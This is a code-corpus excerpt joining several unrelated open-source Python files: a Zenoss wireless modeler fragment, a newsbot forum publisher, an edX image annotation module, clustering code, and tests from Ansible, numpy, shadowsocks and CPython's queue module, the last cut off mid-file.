getdata, tabledata = results
acc_points = tabledata.get('hwApObjectsTable', {})
lldp = tabledata.get('hwApLldpTable', {})
regions = tabledata.get('hwApRegionTable', {})
# AP Region Component
for snmpindex, row in regions.items():
name = row.get('hwApRegionName')
if not name:
log.warn('Skipping region with no name')
continue
regionnames.append(name)
regionmap.append(ObjectMap({
'id': self.prepId(name),
'title': name,
'snmpindex': snmpindex.strip('.'),
'regiondeploymode': DEPLOYMODES.get(row.get('hwApRegionDeployMode'), 'Unknown'),
'regionapnumber': row.get('hwApRegionApNumber'),
}))
# Access Point Component
for region in regionnames:
apmap = []
for snmpindex, row in acc_points.items():
neighbour = ""
neighport = ""
name = row.get('hwApSysName')
regionrow = regions.get('.' + str(row.get('hwApUsedRegionIndex')))
apregion = regionrow.get('hwApRegionName')
if not name:
log.warn('Skipping access point with no name')
continue
if region == apregion:
apneighbour = lldp.get(snmpindex + '.200.1')
if apneighbour is not None:
neighbour = apneighbour.get('hwApLldpRemSysName')
neighport = apneighbour.get('hwApLldpRemPortId')
apmap.append(ObjectMap({
'id': self.prepId(name),
'title': name,
'snmpindex': snmpindex.strip('.'),
'apip': row.get('hwApIpAddress'),
'apmac': self.asmac(row.get('hwApMac')),
'apserial': row.get('hwApSn'),
'apmodel': row.get('hwApUsedType'),
'apstatus': STATUSNAME.get(row.get('hwApRunState'), 'Unknown'),
'apregion': apregion,
'apsoftwareversion': row.get('hwApSoftwareVersion'),
'apneighbourname' : neighbour,
'apneighbourport' : neighport,
}))
maps.append(RelationshipMap(
compname='huaweiAPRegions/%s' % region,
relname='huaweiAccessPoints',
modname='ZenPacks.community.HuaweiWireless.HuaweiAccessPoint',
objmaps=apmap))
# Map main device details
maps.append(ObjectMap(
modname='ZenPacks.community.HuaweiWireless.HuaweiControllerDevice',
data={
'setHWSerialNumber': getdata.get('entPhysicalSerialNum'),
'setOSProductKey': MultiArgs(getdata.get('entPhysicalSoftwareRev'), 'HUAWEI Technology Co.,Ltd'),
'controller_maxap': getdata.get('hwWlanAcAccessMaxApNumber'),
}))
# Map AP Region components
maps.append(RelationshipMap(
relname='huaweiAPRegions',
modname='ZenPacks.community.HuaweiWireless.HuaweiAPRegion',
objmaps=regionmap))
return maps
|
unix-beard/newsbot
|
refs/heads/master
|
server/modules/feedpublish/feedpublish.py
|
2
|
#-*- coding: utf-8 -*-
__name__ = 'publisher'
import feedparser
import operator
import time
import datetime
import sys
import atexit
import hashlib
import sqlite3
import sqlitebck
import loggerfactory
import threading
import Queue
import multiprocessing
import os
import ConfigParser
from forumlogger import *
from multiprocessing import current_process
from threading import current_thread
from response import Response, ResponseStatus
log = None
dbConnection = None
cursor = None
stopRequest = threading.Event()
class StopThreadException(Exception):
""" To exit from publishForever """
pass
class NewsItem:
""" Abstraction around forum news item """
def __init__(self, title, body, url):
self.title = title
self.body = body
self.url = url
def __unicode__(self):
return u'[b]{0}[/b]\n[quote]{1}\n[url={2}]link[/url][/quote]\n'.format(self.title, self.body, self.url)
def __str__(self):
return unicode(self).encode('utf-8')
def fetchItems():
""" Get all news items from DB that need to be publised """
cursor.execute("SELECT hash, title, description, link FROM feed WHERE published = 0 ORDER BY link")
rows = cursor.fetchall()
newsItems = []
for row in rows:
newsItems.append(NewsItem(row[1], row[2], row[3]))
return rows, newsItems
def setAsPublished(rows):
""" Mark each item as published, so we don't have to publish it again """
for row in rows:
cursor.execute('UPDATE feed SET published = 1 where hash = ? and published = 0', (row[0],))
dbConnection.commit()
def nextTime(times):
""" Get the next time to sleep until before we start publishing """
# currentTime is local
currentTime = datetime.datetime.now().time()
nextPublishTime = None
dayCount = 0
log.info('Determining the next publish time in {0}'.format(times))
for t in times:
if currentTime < t:
log.info('Current time is less than {0}'.format(t))
nextPublishTime = t
break
if nextPublishTime is None:
dayCount = 1
nextPublishTime = times[0] if times else datetime.time(14, 55, 0)
d = datetime.datetime.today().date() + datetime.timedelta(days=dayCount)
return datetime.datetime.combine(d, nextPublishTime)
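# A worked example (hypothetical times): with times == [time(9, 0), time(18, 0)]
# and a current local time of 12:30, nextTime returns today at 18:00; at 19:00
# every entry has already passed, so it rolls over to tomorrow at 09:00.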
def sleepUntilWokenUp(interruptRequest, times):
""" Sleep until this time is up or stop request is recieved """
dt = nextTime(times)
log.info('{0} Next publish datetime: [{1}]'.format(current_thread().name, dt))
while dt >= datetime.datetime.today() and not interruptRequest.isSet():
interruptRequest.wait(1)
log.info('{0} is awake'.format(current_thread().name))
def backup(dbFile, dbBackupDir):
#################################################################################
# TODO:
#################################################################################
# 1. Check for ending '/'
# 2. Handle possible errors/exceptions from:
# a. sqlite3.connect
# b. sqlitebck.copy
#################################################################################
log.info('{0} Backing up DB file [{1}] to [{2}]'.format(current_thread().name, dbFile, dbBackupDir))
dbCopyConnection = sqlite3.connect(dbBackupDir + os.path.split(dbFile)[1])
sqlitebck.copy(dbConnection, dbCopyConnection)
log.info('{0} ... OK'.format(current_thread().name))
def publishForever(queue, interruptRequest, times, submitType, dbFile, dbBackupDir):
""" Sleep, check for items to publish, sleep again """
params = None
log.info('{0} started'.format(current_thread().name))
log.info('{0} ... publish time: [{1}]'.format(current_thread().name, times))
log.info('{0} ... submit type: [{1}]'.format(current_thread().name, submitType))
log.info('{0} ... database file:[{1}]'.format(current_thread().name, dbFile))
def stopCommandHandler(params):
raise StopThreadException('{0} requested to stop'.format(current_thread().name))
def setCommandHandler(params):
log.info('{0} There is a set request ({1})'.format(current_thread().name, params))
# fall back to the current values so a partial 'set' request does not
# raise UnboundLocalError when only one of the options is supplied
newTimes, newSubmitType = times, submitType
if params['time']:
newTimes = params['time']
log.info('{0} New times: {1}'.format(current_thread().name, newTimes))
if params['submit_type']:
newSubmitType = params['submit_type']
log.info('{0} New submit type: {1}'.format(current_thread().name, newSubmitType))
interruptRequest.clear()
return (newTimes, newSubmitType)
dispatch = {'stop': stopCommandHandler, 'set' : setCommandHandler}
try:
global dbConnection, cursor
dbConnection = sqlite3.connect(dbFile)
cursor = dbConnection.cursor()
while True:
while not interruptRequest.isSet():
sleepUntilWokenUp(interruptRequest, times)
if interruptRequest.isSet():
break
log.info('{0} Fetching fresh items'.format(current_thread().name))
(rows, items) = fetchItems()
log.info('{0} ... OK. Fetched {1} items'.format(current_thread().name, len(items)))
# If there is nothing to publish, go back to sleep
if not items:
log.info('{0} Nothing to submit'.format(current_thread().name))
continue
log.info(u'{0} {1}'.format(current_thread().name, u''.join([unicode(i) for i in items])))
try:
fl = ForumLogger(interruptRequest, log, dbFile)
if fl.loginToForum():
fl.submit(items, submitType)
setAsPublished(rows)
backup(dbFile, dbBackupDir)
else:
log.error("{0} Can't login".format(current_thread().name))
except Exception as ex:
log.exception(u'{0} {1}'.format(current_thread().name, repr(ex)))
log.info('{0} interrupted. Waiting for command'.format(current_thread().name))
(command, params) = queue.get()
log.info('{0} ... Received command [{1}]'.format(current_thread().name, command))
(times, submitType) = dispatch[command](params)
log.info('submitType {0}'.format(submitType))
log.info('times {0}'.format(times))
except StopThreadException as ex:
# We were requested to stop
log.info(repr(ex))
except Exception as ex:
log.exception(repr(ex))
def validateTime(rawStrTimes):
"""
Traverse the list of string times and convert them to python datetime.time objects.
E.g., ["09:00:00", "10:01:02", "22:15:30"] will be converted to
[datetime.time(9, 0), datetime.time(10,1,2), datetime.time(22,15,30)] respectively
"""
pyTimes = []
for t in rawStrTimes:
try:
pyTimes.append(datetime.datetime.strptime(t, "%H:%M:%S").time())
except ValueError as err:
log.warning('{0} validateTime - Can\'t convert "{1}". Skipping'.format(current_process().name, t))
# Sort times in ascending order
pyTimes.sort()
return pyTimes
def validateSubmitType(submitType):
if submitType == 'post' or submitType == 'preview':
return submitType
else:
log.warning('{0} validateSubmitType - Unknown submit type "{1}". Skipping'.format(current_process().name, submitType))
return None
def readConfigFile(configFile, section, options=None):
logs = [('info', 'Reading config file [{0}]'.format(configFile))]
config = ConfigParser.ConfigParser()
if not config.read(configFile):
logs.append(('warning', 'Can\'t read config file'))
return (options, logs)
if section not in config.sections():
logs.append(('warning', 'Section [{0}] not found. Will use defaults'.format(section)))
return (options, logs)
for op in options:
if config.has_option(section, op):
if op == 'time':
options[op] = [t.strip() for t in config.get(section, op).split(',')]
else:
options[op] = config.get(section, op)
return (options, logs)
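# A sketch of the expected INI layout (the section name comes from
# __name__.upper(), i.e. [PUBLISHER]; values shown are illustrative):
#   [PUBLISHER]
#   db_file = /tmp/feeds.db
#   log_file = /tmp/publish1.log
#   time = 09:00:00, 18:00:00
#   submit_type = preview
#   db_backup_dir = /tmp/backup/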
def getStartParams(params):
startParams = {
'db_file': '/tmp/feeds.db',
'log_file': '/tmp/publish1.log',
'time': ["14:55:00"],
'submit_type': 'post',
'db_backup_dir': '/home/shvonder/Dropbox/'
}
(startParams, logs) = readConfigFile(params['module_ini'], __name__.upper(), startParams)
global log
log = loggerfactory.createLogger(__name__, startParams['log_file'])
logDispatch = {
'info': lambda l, s: l.info(s),
'debug': lambda l, s: l.debug(s),
'warning': lambda l, s: l.warning(s),
'error': lambda l, s: l.error(s)
}
for l in logs:
logDispatch[l[0]](log, l[1])
log.info(startParams)
return (startParams['db_file'], startParams['db_backup_dir'], validateTime(startParams['time']), startParams['submit_type'])
def stopCommandHandler(interruptRequest, commandQueue, params):
""" Handle 'stop' command """
log.info('{0} Handling [stop] command'.format(current_process().name))
interruptRequest.set()
commandQueue.put(('stop', None))
stopRequest.set()
log.info('{0} ... OK'.format(current_process().name))
def setCommandHandler(interruptRequest, commandQueue, params):
""" Hanlde 'set' command """
log.info('{0} Handling [set] command'.format(current_process().name))
newParams = {'time' : [], 'submit_type' : None}
if 'time' in params:
newParams['time'] = validateTime(params['time'])
if 'submit_type' in params:
newParams['submit_type'] = validateSubmitType(params['submit_type'])
interruptRequest.set()
commandQueue.put(('set', newParams))
log.info('{0} ... OK'.format(current_process().name))
def run(queue, params):
""" Start a publisher thread to publish forever """
try:
(dbFile, dbBackupDir, times, submitType) = getStartParams(params)
log.info('{0} started'.format(current_process().name))
commandQueue = Queue.Queue()
interruptRequest = threading.Event()
publishThread = threading.Thread(target=publishForever,
args=(commandQueue, interruptRequest, times, submitType, dbFile, dbBackupDir),
name="PublishThread")
publishThread.start()
dispatch = {'stop' : stopCommandHandler, 'set' : setCommandHandler}
while not stopRequest.isSet():
(command, params) = queue.get()
log.info('{0} received command: [{1}]'.format(current_process().name, str(command)))
try:
dispatch[command](interruptRequest, commandQueue, params)
queue.put(Response())
except Exception as ex:
queue.put(Response(message=str(ex), status=ResponseStatus.ERROR))
log.info('{0} Waiting for {1} to stop'.format(current_process().name, publishThread.name))
publishThread.join()
log.info('{0} ... OK'.format(current_process().name))
except Exception as ex:
log.exception(repr(ex))
log.info('{0} terminated'.format(__name__))
|
edxzw/edx-platform
|
refs/heads/master
|
common/lib/xmodule/xmodule/imageannotation_module.py
|
14
|
"""
Module for Image annotations using annotator.
"""
from lxml import etree
from pkg_resources import resource_string
from xmodule.x_module import XModule
from xmodule.raw_module import RawDescriptor
from xblock.core import Scope, String
from xmodule.annotator_mixin import get_instructions, html_to_text
from xmodule.annotator_token import retrieve_token
from xblock.fragment import Fragment
import textwrap
# Make '_' a no-op so we can scrape strings. Using lambda instead of
# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file
_ = lambda text: text
class AnnotatableFields(object):
""" Fields for `ImageModule` and `ImageDescriptor`. """
data = String(
help=_("XML data for the annotation"),
scope=Scope.content,
default=textwrap.dedent("""\
<annotatable>
<instructions>
<p>
Add the instructions to the assignment here.
</p>
</instructions>
<p>
Lorem ipsum dolor sit amet, at amet animal petentium nec. Id augue nemore postulant mea. Ex eam dicant noluisse expetenda, alia admodum abhorreant qui et. An ceteros expetenda mea, tale natum ipsum quo no, ut pro paulo alienum noluisse.
</p>
<json>
navigatorSizeRatio: 0.25,
wrapHorizontal: false,
showNavigator: true,
navigatorPosition: "BOTTOM_LEFT",
showNavigationControl: true,
tileSources: [{"profile": "http://library.stanford.edu/iiif/image-api/1.1/compliance.html#level2", "scale_factors": [1, 2, 4, 8, 16, 32, 64], "tile_height": 1024, "height": 3466, "width": 113793, "tile_width": 1024, "qualities": ["native", "bitonal", "grey", "color"], "formats": ["jpg", "png", "gif"], "@context": "http://library.stanford.edu/iiif/image-api/1.1/context.json", "@id": "http://54.187.32.48/loris/suzhou_orig.jp2"}],
</json>
</annotatable>
"""))
display_name = String(
display_name=_("Display Name"),
help=_("Display name for this module"),
scope=Scope.settings,
default=_('Image Annotation'),
)
instructor_tags = String(
display_name=_("Tags for Assignments"),
help=_("Add tags that automatically highlight in a certain color using the comma-separated form, i.e. imagery:red,parallelism:blue"),
scope=Scope.settings,
default='professor:green,teachingAssistant:blue',
)
annotation_storage_url = String(
help=_("Location of Annotation backend"),
scope=Scope.settings,
default="http://your_annotation_storage.com",
display_name=_("Url for Annotation Storage")
)
annotation_token_secret = String(
help=_("Secret string for annotation storage"),
scope=Scope.settings,
default="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
display_name=_("Secret Token String for Annotation")
)
default_tab = String(
display_name=_("Default Annotations Tab"),
help=_("Select which tab will be the default in the annotations table: myNotes, Instructor, or Public."),
scope=Scope.settings,
default="myNotes",
)
# currently only supports one instructor, will build functionality for multiple later
instructor_email = String(
display_name=_("Email for 'Instructor' Annotations"),
help=_("Email of the user that will be attached to all annotations that will be found in 'Instructor' tab."),
scope=Scope.settings,
default="",
)
annotation_mode = String(
display_name=_("Mode for Annotation Tool"),
help=_("Type in number corresponding to following modes: 'instructor' or 'everyone'"),
scope=Scope.settings,
default="everyone",
)
class ImageAnnotationModule(AnnotatableFields, XModule):
'''Image Annotation Module'''
js = {
'coffee': [
resource_string(__name__, 'js/src/javascript_loader.coffee'),
resource_string(__name__, 'js/src/html/display.coffee'),
resource_string(__name__, 'js/src/annotatable/display.coffee'),
],
'js': [
resource_string(__name__, 'js/src/collapsible.js'),
]
}
css = {'scss': [resource_string(__name__, 'css/annotatable/display.scss')]}
icon_class = 'imageannotation'
def __init__(self, *args, **kwargs):
super(ImageAnnotationModule, self).__init__(*args, **kwargs)
xmltree = etree.fromstring(self.data)
self.instructions = self._extract_instructions(xmltree)
self.openseadragonjson = html_to_text(etree.tostring(xmltree.find('json'), encoding='unicode'))
self.user_email = ""
self.is_course_staff = False
if self.runtime.get_user_role() in ['instructor', 'staff']:
self.is_course_staff = True
if self.runtime.get_real_user is not None:
try:
self.user_email = self.runtime.get_real_user(self.runtime.anonymous_student_id).email
except Exception: # pylint: disable=broad-except
self.user_email = _("No email address found.")
def _extract_instructions(self, xmltree):
""" Removes <instructions> from the xmltree and returns them as a string, otherwise None. """
return get_instructions(xmltree)
def student_view(self, context):
""" Renders parameters to template. """
context = {
'display_name': self.display_name_with_default,
'instructions_html': self.instructions,
'token': retrieve_token(self.user_email, self.annotation_token_secret),
'tag': self.instructor_tags,
'openseadragonjson': self.openseadragonjson,
'annotation_storage': self.annotation_storage_url,
'default_tab': self.default_tab,
'instructor_email': self.instructor_email,
'annotation_mode': self.annotation_mode,
'is_course_staff': self.is_course_staff,
}
fragment = Fragment(self.system.render_template('imageannotation.html', context))
# TinyMCE already exists in Studio so we should not load the files again
# get_real_user always returns "None" in Studio since its runtimes contains no anonymous ids
if self.runtime.get_real_user is not None:
fragment.add_javascript_url(self.runtime.STATIC_URL + "js/vendor/tinymce/js/tinymce/tinymce.full.min.js")
fragment.add_javascript_url(self.runtime.STATIC_URL + "js/vendor/tinymce/js/tinymce/jquery.tinymce.min.js")
return fragment
class ImageAnnotationDescriptor(AnnotatableFields, RawDescriptor):
''' Image annotation descriptor '''
module_class = ImageAnnotationModule
mako_template = "widgets/raw-edit.html"
@property
def non_editable_metadata_fields(self):
non_editable_fields = super(ImageAnnotationDescriptor, self).non_editable_metadata_fields
non_editable_fields.extend([
ImageAnnotationDescriptor.annotation_storage_url,
ImageAnnotationDescriptor.annotation_token_secret,
])
return non_editable_fields
|
Parareru/shadowsocks
|
refs/heads/master
|
tests/graceful_cli.py
|
977
|
#!/usr/bin/python
import socks
import time
SERVER_IP = '127.0.0.1'
SERVER_PORT = 8001
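# Open a TCP connection to the test server through the local SOCKS5 proxy on
# port 1081, send a few bytes, then idle for 30s so a graceful shutdown of
# the proxy can be exercised while the connection is still alive.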
if __name__ == '__main__':
s = socks.socksocket()
s.set_proxy(socks.SOCKS5, SERVER_IP, 1081)
s.connect((SERVER_IP, SERVER_PORT))
s.send(b'test')
time.sleep(30)
s.close()
|
fgiunta/data-science-from-scratch
|
refs/heads/master
|
code/clustering.py
|
60
|
from __future__ import division
from linear_algebra import squared_distance, vector_mean, distance
import math, random
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
class KMeans:
"""performs k-means clustering"""
def __init__(self, k):
self.k = k # number of clusters
self.means = None # means of clusters
def classify(self, input):
"""return the index of the cluster closest to the input"""
return min(range(self.k),
key=lambda i: squared_distance(input, self.means[i]))
def train(self, inputs):
self.means = random.sample(inputs, self.k)
assignments = None
while True:
# Find new assignments
new_assignments = map(self.classify, inputs)
# If no assignments have changed, we're done.
if assignments == new_assignments:
return
# Otherwise keep the new assignments,
assignments = new_assignments
for i in range(self.k):
i_points = [p for p, a in zip(inputs, assignments) if a == i]
# avoid divide-by-zero if i_points is empty
if i_points:
self.means[i] = vector_mean(i_points)
def squared_clustering_errors(inputs, k):
"""finds the total squared error from k-means clustering the inputs"""
clusterer = KMeans(k)
clusterer.train(inputs)
means = clusterer.means
assignments = map(clusterer.classify, inputs)
return sum(squared_distance(input,means[cluster])
for input, cluster in zip(inputs, assignments))
def plot_squared_clustering_errors(plt):
ks = range(1, len(inputs) + 1)
errors = [squared_clustering_errors(inputs, k) for k in ks]
plt.plot(ks, errors)
plt.xticks(ks)
plt.xlabel("k")
plt.ylabel("total squared error")
plt.show()
#
# using clustering to recolor an image
#
def recolor_image(input_file, k=5):
img = mpimg.imread(input_file)
pixels = [pixel for row in img for pixel in row]
clusterer = KMeans(k)
clusterer.train(pixels) # this might take a while
def recolor(pixel):
cluster = clusterer.classify(pixel) # index of the closest cluster
return clusterer.means[cluster] # mean of the closest cluster
new_img = [[recolor(pixel) for pixel in row]
for row in img]
plt.imshow(new_img)
plt.axis('off')
plt.show()
#
# hierarchical clustering
#
def is_leaf(cluster):
"""a cluster is a leaf if it has length 1"""
return len(cluster) == 1
def get_children(cluster):
"""returns the two children of this cluster if it's a merged cluster;
raises an exception if this is a leaf cluster"""
if is_leaf(cluster):
raise TypeError("a leaf cluster has no children")
else:
return cluster[1]
def get_values(cluster):
"""returns the value in this cluster (if it's a leaf cluster)
or all the values in the leaf clusters below it (if it's not)"""
if is_leaf(cluster):
return cluster # is already a 1-tuple containing value
else:
return [value
for child in get_children(cluster)
for value in get_values(child)]
def cluster_distance(cluster1, cluster2, distance_agg=min):
"""finds the aggregate distance between elements of cluster1
and elements of cluster2"""
return distance_agg([distance(input1, input2)
for input1 in get_values(cluster1)
for input2 in get_values(cluster2)])
def get_merge_order(cluster):
if is_leaf(cluster):
return float('inf')
else:
return cluster[0] # merge_order is first element of 2-tuple
def bottom_up_cluster(inputs, distance_agg=min):
# start with every input a leaf cluster / 1-tuple
clusters = [(input,) for input in inputs]
# as long as we have more than one cluster left...
while len(clusters) > 1:
# find the two closest clusters
c1, c2 = min([(cluster1, cluster2)
for i, cluster1 in enumerate(clusters)
for cluster2 in clusters[:i]],
key=lambda (x, y): cluster_distance(x, y, distance_agg))
# remove them from the list of clusters
clusters = [c for c in clusters if c != c1 and c != c2]
# merge them, using merge_order = # of clusters left
merged_cluster = (len(clusters), [c1, c2])
# and add their merge
clusters.append(merged_cluster)
# when there's only one cluster left, return it
return clusters[0]
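# Cluster representation used above (a sketch): a leaf is a 1-tuple such as
# ([10, 20],); a merged cluster is (merge_order, [child1, child2]), where
# merge_order is the number of clusters remaining at merge time, so smaller
# values mean later merges, e.g. (5, [([1, 2],), ([3, 4],)]).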
def generate_clusters(base_cluster, num_clusters):
# start with a list with just the base cluster
clusters = [base_cluster]
# as long as we don't have enough clusters yet...
while len(clusters) < num_clusters:
# choose the last-merged of our clusters
next_cluster = min(clusters, key=get_merge_order)
# remove it from the list
clusters = [c for c in clusters if c != next_cluster]
# and add its children to the list (i.e., unmerge it)
clusters.extend(get_children(next_cluster))
# once we have enough clusters...
return clusters
if __name__ == "__main__":
inputs = [[-14,-5],[13,13],[20,23],[-19,-11],[-9,-16],[21,27],[-49,15],[26,13],[-46,5],[-34,-1],[11,15],[-49,0],[-22,-16],[19,28],[-12,-8],[-13,-19],[-41,8],[-11,-6],[-25,-9],[-18,-3]]
random.seed(0) # so you get the same results as me
clusterer = KMeans(3)
clusterer.train(inputs)
print "3-means:"
print clusterer.means
print
random.seed(0)
clusterer = KMeans(2)
clusterer.train(inputs)
print "2-means:"
print clusterer.means
print
print "errors as a function of k"
for k in range(1, len(inputs) + 1):
print k, squared_clustering_errors(inputs, k)
print
print "bottom up hierarchical clustering"
base_cluster = bottom_up_cluster(inputs)
print base_cluster
print
print "three clusters, min:"
for cluster in generate_clusters(base_cluster, 3):
print get_values(cluster)
print
print "three clusters, max:"
base_cluster = bottom_up_cluster(inputs, max)
for cluster in generate_clusters(base_cluster, 3):
print get_values(cluster)
|
potzenheimer/xdash
|
refs/heads/master
|
src/xpose.sitetheme/xpose/sitetheme/__init__.py
|
26
|
# -*- extra stuff goes here -*-
def initialize(context):
"""Initializer called when used as a Zope 2 product."""
|
hyperized/ansible
|
refs/heads/devel
|
test/units/modules/network/nxos/test_nxos_command.py
|
51
|
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from units.compat.mock import patch
from ansible.modules.network.nxos import nxos_command
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosCommandModule(TestNxosModule):
module = nxos_command
def setUp(self):
super(TestNxosCommandModule, self).setUp()
self.mock_run_commands = patch('ansible.modules.network.nxos.nxos_command.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestNxosCommandModule, self).tearDown()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None, device=''):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for item in commands:
try:
obj = json.loads(item['command'])
command = obj['command']
except ValueError:
command = item['command']
filename = '%s.txt' % str(command).replace(' ', '_')
output.append(load_fixture('nxos_command', filename))
return output
self.run_commands.side_effect = load_from_file
def test_nxos_command_simple(self):
set_module_args(dict(commands=['show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 1)
self.assertTrue(result['stdout'][0].startswith('Cisco'))
def test_nxos_command_multiple(self):
set_module_args(dict(commands=['show version', 'show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 2)
self.assertTrue(result['stdout'][0].startswith('Cisco'))
def test_nxos_command_wait_for(self):
wait_for = 'result[0] contains "NX-OS"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module()
def test_nxos_command_wait_for_fails(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 10)
def test_nxos_command_retries(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for, retries=2))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 2)
def test_nxos_command_match_any(self):
wait_for = ['result[0] contains "Cisco"',
'result[0] contains "test string"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='any'))
self.execute_module()
def test_nxos_command_match_all(self):
wait_for = ['result[0] contains "Cisco"',
'result[0] contains "image file"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='all'))
self.execute_module()
def test_nxos_command_match_all_failure(self):
wait_for = ['result[0] contains "Cisco"',
'result[0] contains "test string"']
commands = ['show version', 'show version']
set_module_args(dict(commands=commands, wait_for=wait_for, match='all'))
self.execute_module(failed=True)
|
cmdunkers/DeeperMind
|
refs/heads/master
|
PythonEnv/lib/python2.7/site-packages/numpy/distutils/tests/test_exec_command.py
|
201
|
from __future__ import division, absolute_import, print_function
import os
import sys
from tempfile import TemporaryFile
from numpy.distutils import exec_command
# In python 3 stdout, stderr are text (unicode compliant) devices, so to
# emulate them import StringIO from the io module.
if sys.version_info[0] >= 3:
from io import StringIO
else:
from StringIO import StringIO
class redirect_stdout(object):
"""Context manager to redirect stdout for exec_command test."""
def __init__(self, stdout=None):
self._stdout = stdout or sys.stdout
def __enter__(self):
self.old_stdout = sys.stdout
sys.stdout = self._stdout
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush()
sys.stdout = self.old_stdout
# note: closing sys.stdout won't close it.
self._stdout.close()
class redirect_stderr(object):
"""Context manager to redirect stderr for exec_command test."""
def __init__(self, stderr=None):
self._stderr = stderr or sys.stderr
def __enter__(self):
self.old_stderr = sys.stderr
sys.stderr = self._stderr
def __exit__(self, exc_type, exc_value, traceback):
self._stderr.flush()
sys.stderr = self.old_stderr
# note: closing sys.stderr won't close it.
self._stderr.close()
class emulate_nonposix(object):
"""Context manager to emulate os.name != 'posix' """
def __init__(self, osname='non-posix'):
self._new_name = osname
def __enter__(self):
self._old_name = os.name
os.name = self._new_name
def __exit__(self, exc_type, exc_value, traceback):
os.name = self._old_name
def test_exec_command_stdout():
# Regression test for gh-2999 and gh-2915.
# There are several packages (nose, scipy.weave.inline, Sage inline
# Fortran) that replace stdout, in which case it doesn't have a fileno
# method. This is tested here, with a do-nothing command that fails if the
# presence of fileno() is assumed in exec_command.
# The code has a special case for posix systems, so if we are on posix test
# both that the special case works and that the generic code works.
# Test posix version:
with redirect_stdout(StringIO()):
with redirect_stderr(TemporaryFile()):
exec_command.exec_command("cd '.'")
if os.name == 'posix':
# Test general (non-posix) version:
with emulate_nonposix():
with redirect_stdout(StringIO()):
with redirect_stderr(TemporaryFile()):
exec_command.exec_command("cd '.'")
def test_exec_command_stderr():
# Test posix version:
with redirect_stdout(TemporaryFile(mode='w+')):
with redirect_stderr(StringIO()):
exec_command.exec_command("cd '.'")
if os.name == 'posix':
# Test general (non-posix) version:
with emulate_nonposix():
with redirect_stdout(TemporaryFile()):
with redirect_stderr(StringIO()):
exec_command.exec_command("cd '.'")
|
zxsted/scipy
|
refs/heads/master
|
scipy/weave/weave_version.py
|
100
|
from __future__ import absolute_import, print_function
major = 0
minor = 4
micro = 9
#release_level = 'alpha'
release_level = ''
if release_level:
weave_version = '%(major)d.%(minor)d.%(micro)d_%(release_level)s'\
% (locals())
else:
weave_version = '%(major)d.%(minor)d.%(micro)d'\
% (locals())
|
kikocorreoso/brython
|
refs/heads/master
|
www/src/Lib/test/test_queue.py
|
2
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import itertools
import random
import threading
import time
import unittest
import weakref
from test import support
py_queue = support.import_fresh_module('queue', blocked=['_queue'])
c_queue = support.import_fresh_module('queue', fresh=['_queue'])
need_c_queue = unittest.skipUnless(c_queue, "No _queue module found")
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
thread = _TriggerThread(trigger_func, trigger_args)
thread.start()
try:
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not thread.startedEvent.is_set():
self.fail("blocking function %r appeared not to block" %
block_func)
return self.result
finally:
support.join_thread(thread, 10) # make sure the thread terminates
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self, block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
thread = _TriggerThread(trigger_func, trigger_args)
thread.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
support.join_thread(thread, 10) # make sure the thread terminates
if not thread.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTestMixin(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def basic_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
self.assertTrue(q.empty())
self.assertFalse(q.full())
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
